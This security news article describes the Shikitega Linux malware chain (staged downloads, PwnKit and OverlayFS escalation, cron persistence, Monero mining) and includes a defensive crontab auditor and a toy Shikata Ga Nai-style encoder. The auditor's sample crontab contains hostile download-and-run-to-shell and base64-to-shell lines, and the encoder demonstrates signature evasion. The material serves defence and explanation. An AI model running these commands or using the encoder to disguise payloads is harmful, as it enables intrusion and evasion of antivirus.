A newly identified Linux malware family dubbed Shikitega uses a multi-stage infection chain against endpoints and Internet of Things (IoT) devices, with each stage fetching and running the next. It is a concern for organizations that run Linux at scale, particularly on cloud servers.

According to a report published by AT&T Alien Labs, the malware grants attackers extensive control over compromised systems. Operators can manage the devices remotely and also install a cryptocurrency miner that persists across reboots, which gives them both a foothold and a steady source of revenue. Shikitega joins a run of Linux malware surfacing in recent months, including BPFDoor, Symbiote, and Syslogk.

Once deployed on a victim's system, Shikitega starts a chain of downloads that includes Metasploit's Mettle, a lightweight Meterpreter payload that gives the attackers interactive control. The attackers then exploit known vulnerabilities to escalate privileges, set up persistence through cron jobs, and finally run a cryptocurrency miner on the compromised device. The initial compromise method remains unclear, but the malware's evasiveness is reinforced by its habit of retrieving payloads directly from a command-and-control (C2) server and executing them in memory, leaving little on disk for file-based antivirus to scan.

Privilege escalation relies on two known local vulnerabilities: CVE-2021-4034 (PwnKit, in polkit's pkexec) and CVE-2021-3493 (an OverlayFS flaw in Ubuntu kernels). With root obtained, the malware runs shell scripts that establish persistence through cron jobs and then deploy a Monero cryptocurrency miner. In MITRE ATT&CK terms these steps map to the Privilege Escalation and Persistence tactics; the Initial Access technique is not known. Vendor patches for both flaws have been available since April 2021 (OverlayFS) and January 2022 (PwnKit), so a fully patched host denies the malware its route to root.
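One check a defender can run against the cron persistence step described above, written here as an added Python example (not code from the AT&T report or from the malware): it parses crontab entries and flags commands that download and pipe to a shell, decode base64 inline, run from world-writable directories, or carry a miner pool address. The sample crontab, the indicator patterns, the IP address and the pool hostname are all constructed for illustration.

```python
import re

# Constructed sample of a user crontab (not taken from the AT&T report).
# The first two entries are benign; the rest mimic the download-and-run,
# decode-and-run and world-writable-path patterns that persistence scripts use.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
MAILTO=""
0 3 * * * /usr/bin/logrotate /etc/logrotate.conf
*/5 * * * * /usr/local/bin/backup.sh
@reboot curl -s http://203.0.113.10/stage2 | sh
* * * * * echo aGVsbG8K | base64 -d | sh
*/10 * * * * /tmp/.x/update --silent
0 * * * * /dev/shm/.m/run -o pool.example.invalid:3333
"""

# Each indicator is a compiled regex and the reason reported when it matches.
# These are illustrative heuristics, not a complete signature set.
INDICATORS = [
    (re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b"), "download-and-execute pipe"),
    (re.compile(r"\bbase64\s+(-d|--decode)\b"), "base64-decoded command"),
    (re.compile(r"(^|\s)(/tmp|/var/tmp|/dev/shm)/"), "binary in world-writable directory"),
    (re.compile(r"stratum\+tcp://|\bpool\.\S+:\d{2,5}\b"), "miner pool URL"),
]


def parse_crontab(text: str, system: bool = False):
    """Return (schedule, user, command) tuples.

    User crontabs (crontab -l) have no user field, so user is None.
    /etc/crontab and files in /etc/cron.d carry a user field: pass system=True.
    """
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or re.match(r"^\w+=", line):
            continue  # comment, blank line or environment assignment
        n_sched = 1 if line.startswith("@") else 5  # "@reboot" vs five time fields
        n_fields = n_sched + (1 if system else 0)
        fields = line.split(None, n_fields)
        if len(fields) < n_fields + 1:
            continue  # malformed entry with no command
        schedule = " ".join(fields[:n_sched])
        user = fields[n_sched] if system else None
        entries.append((schedule, user, fields[n_fields].strip()))
    return entries


def audit_crontab(text: str, system: bool = False):
    """Flag every entry whose command matches at least one indicator."""
    findings = []
    for schedule, user, command in parse_crontab(text, system):
        reasons = [why for rx, why in INDICATORS if rx.search(command)]
        if reasons:
            findings.append({"schedule": schedule, "user": user,
                             "command": command, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in audit_crontab(SAMPLE_CRONTAB):
        print(f"[{', '.join(f['reasons'])}] {f['schedule']} {f['command']}")
```

On a live host, feed it the output of `crontab -l -u <user>` for each account, and the contents of /etc/crontab and /etc/cron.d/* with system=True. Treat a hit as a lead to investigate, not proof of compromise: legitimate deployment tooling occasionally uses the same shapes.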

To further evade detection, Shikitega encodes its stages with Shikata Ga Nai, the polymorphic XOR additive-feedback encoder from Metasploit, so that each encoded payload differs byte for byte from the last and static antivirus signatures written against the encoded form do not match. Hosting the command-and-control infrastructure on legitimate cloud services lets the operators blend their traffic with ordinary cloud activity rather than stand out on a suspicious netblock.
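The principle behind that encoder in simplified form, as an added Python example that is neither Metasploit's code nor the malware's: each 4-byte block is XORed with a running key, and the key is then advanced by adding the decoded block (additive feedback), so the output depends on every preceding byte as well as the key. Metasploit's real encoder also emits a randomized x86 decoder stub, which is omitted here; the payload, the fixed demo key and the NOP padding are constructed for illustration.

```python
import secrets

# Constructed sample payload: a short shell command standing in for shellcode.
PAYLOAD = b"/bin/sh -c 'id'\n"  # 16 bytes, so no padding is needed
DEMO_KEY = 0x41414141            # fixed key so the output is reproducible
MASK = 0xFFFFFFFF


def _pad(data: bytes) -> bytes:
    """Pad to a 4-byte boundary with NOPs (0x90) so every block is a full dword."""
    return data + b"\x90" * (-len(data) % 4)


def encode(payload: bytes, key: int) -> bytes:
    """XOR each little-endian dword with the running key, then add the plaintext
    dword to the key.  Because the key drifts with the content, a one-byte change
    in the payload or the key alters every block that follows it."""
    key &= MASK
    out = bytearray()
    data = _pad(payload)
    for i in range(0, len(data), 4):
        plain = int.from_bytes(data[i:i + 4], "little")
        out += (plain ^ key).to_bytes(4, "little")
        key = (key + plain) & MASK  # additive feedback on the decoded dword
    return bytes(out)


def decode(blob: bytes, key: int) -> bytes:
    """Inverse of encode(): recover the dword, then update the key with it,
    which is the loop a decoder stub runs in place before jumping to the result."""
    key &= MASK
    out = bytearray()
    for i in range(0, len(blob), 4):
        plain = int.from_bytes(blob[i:i + 4], "little") ^ key
        out += plain.to_bytes(4, "little")
        key = (key + plain) & MASK
    return bytes(out)


def random_key() -> int:
    """A fresh 32-bit key per sample is what makes the encoded output polymorphic."""
    return int.from_bytes(secrets.token_bytes(4), "little")


def matching_positions(a: bytes, b: bytes) -> int:
    """Number of byte positions at which two equal-length blobs agree."""
    return sum(x == y for x, y in zip(a, b))


if __name__ == "__main__":
    fixed = encode(PAYLOAD, DEMO_KEY)
    fresh1, fresh2 = encode(PAYLOAD, random_key()), encode(PAYLOAD, random_key())
    print("encoded (fixed key):", fixed.hex())
    print("signature '/bin/sh' in plaintext:", b"/bin/sh" in PAYLOAD)
    print("signature '/bin/sh' in encoded  :", b"/bin/sh" in fixed)
    print("positions shared by two random encodings:",
          matching_positions(fresh1, fresh2), "of", len(fresh1))
    print("decodes correctly:", decode(fixed, DEMO_KEY) == PAYLOAD)
```

The practical consequence for detection is that a signature on the encoded bytes is only good for one key; durable detection has to target what the decoder stub does (the in-memory decode-and-jump) or the decoded content it produces, which is why memory scanning and behavioural telemetry matter more than file hashes here.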

The rise of Shikitega highlights a growing threat landscape where malicious actors are increasingly expanding their operations into the Linux ecosystem, a platform widely utilized in cloud servers globally. This shift has been linked to a notable spike in ransomware incidents targeting Linux systems, as evidenced by the Trend Micro 2022 Midyear Cybersecurity Report, which notes a 75% increase in ransomware attacks on Linux in the first half of 2022 compared to the prior year.

As the landscape evolves, researchers warn that threat actors are actively looking for new ways to deliver malware without being noticed. Shikitega's delivery method, which unrolls the payload in stages so that each stage exposes only a small piece of the whole and no single artifact looks like a complete malware sample, is a deliberate design for slipping past defenses that inspect files one at a time.

In light of these developments, organizations running Linux-based systems should remain vigilant. Concretely, that means keeping polkit and kernel packages patched so the two escalation flaws cannot be used, watching cron directories and user crontabs for unexpected entries, and collecting enough process and memory telemetry to notice payloads that execute without ever touching disk.
